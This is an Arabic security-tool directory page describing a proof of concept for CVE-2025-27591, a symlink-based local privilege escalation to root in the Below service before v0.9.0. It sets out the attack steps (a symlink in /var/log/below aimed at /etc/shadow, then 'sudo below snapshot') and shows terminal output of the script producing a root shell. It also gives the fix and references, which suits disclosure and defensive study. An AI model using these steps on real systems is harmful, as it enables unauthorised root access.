Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-27591-PoC — إثبات مفهوم لـ CVE-2025-27591، وهو تصعيد امتيازات محلي في Below < v0.9.0 | Kitploit
أدوات/GitHubGitHub/incommatose/cve-2025-27591-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubincommatose/cve-2025-27591-poc

CVE-2025-27591-PoC

إثبات مفهوم لـ CVE-2025-27591، وهو تصعيد امتيازات محلي في Below < v0.9.0

عرض المستودع
51منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-27591 PoC: تصعيد الامتيازات محليًا في Below < v0.9.0

إثبات مفهوم لـ CVE-2025-27591، وهي ثغرة تسمح للمستخدمين المحليين غير المميزين بتصعيد امتيازاتهم إلى صلاحيات الجذر عبر هجمات الروابط الرمزية.

🕵️‍♂️ التفاصيل الفنية

تؤثر الثغرة على خدمة Below (الإصدارات الأقدم من v0.9.0). تنشئ هذه الخدمة دليل /var/log/below بصلاحيات قابلة للكتابة من قبل الجميع (0777)، مما يسمح للمستخدمين المحليين غير المميزين بنقل الروابط الرمزية والتلاعب بملفات حساسة مثل /etc/shadow، مما يؤدي إلى تصعيد الامتيازات إلى الجذر.

🧩 التأثير

يمكن لمستخدم محلي غير مميز تصعيد امتيازاته إلى الجذر عن طريق:

  • إنشاء رابط رمزي في /var/log/below يشير إلى ملف نظام حساس.
  • تشغيل الخدمة باستخدام sudo (مثل: sudo below snapshot)، مما يجعل Below يكتب إلى الرابط الرمزي بصلاحيات الجذر.

✅ المتطلبات

  • يجب أن يمتلك /var/log/below/ صلاحيات قابلة للكتابة من الجميع (0777) ويحتوي على ملف error_root.log.
  • يجب أن يُسمح لك باستخدام sudo /usr/bin/below.
root@kitploit:~
foo@victim:~$ ls -l /var/log/ | grep below
drwxrwxrwx  3 root      root               4096 Jul  8 20:45 below

🛠️ الاستخدام

سنحتاج إلى صلاحيات على مستوى sudoers.

root@kitploit:~
foo@victim:~$ sudo -l
Matching Defaults entries for jacob on victim:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User foo may run the following commands on victim:
    (ALL : ALL) NOPASSWD: /usr/bin/below

بمجرد حصولنا على ملف poc.sh، سنمنحه الصلاحيات اللازمة، وننفذه، وسنصبح root.

root@kitploit:~
foo@victim:/tmp$ chmod +x poc.sh
foo@victim:/tmp$ ./poc.sh 
evil@victim:/tmp# id
uid=0(evil) gid=0(root) groups=0(root)

✅ الإصلاح الرسمي

قم بالترقية إلى Below v0.9.0 أو أحدث، والذي يزيل منطق chmod غير الآمن ويعتمد على ميزات وحدات systemd مثل LogsDirectory=below

⚖️ قانوني

  • هذا السكربت لأغراض تعليمية. احصل دائمًا على إذن صريح قبل إجراء الاختبار.

📚 المراجع

  • NVD
  • wiz.io
  • SUSE Security
تنزيل الأداة